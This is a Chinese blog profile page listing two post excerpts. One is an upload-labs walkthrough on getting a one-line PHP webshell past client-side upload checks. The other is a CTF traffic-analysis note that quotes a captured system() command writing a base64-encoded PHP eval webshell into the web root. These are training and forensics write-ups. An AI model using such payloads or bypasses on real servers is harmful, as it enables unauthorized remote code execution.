- 博客(5)
- 收藏
- 关注
原创 upload-labs靶场攻略(pass1-16)
参考官方即可:upload-labs靶场下载地址:https://github.com/c0ny1/upload-labs1、可以绕过目标服务器的检测,成功上传。2、可以获取到木马文件的存储路径,存储路程具备可执行权限。准备一个webshell.php脚本文件, 是一个简单的一句话木马 将脚本文件上传, 结果直接被网站拦截掉了第一种方法:第一就是将浏览器js代码禁用掉,右键---检查---调试器---设置---禁用JavaScript。上传webshell文件。鼠标右键查看该图像的地址, 即为webs
2024-04-19 23:13:58 943
原创 CTF流量分析
思路:http.request.method =="POST" && http contains "php",追踪流,找到variable=1&tpl=data/Runtime/Logs/Home/21_08_07.log&aaa=system('echo PD9waHAgZXZhbCgkX1JFUVVFU1RbZXNGXSk7Pz4=|base64 -d > /var/www/html/1.php')找j68071301598f写入的内容,且排除前两位再用base64解密,找到frpc.ini文件。
2024-04-19 15:00:23 255 2
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人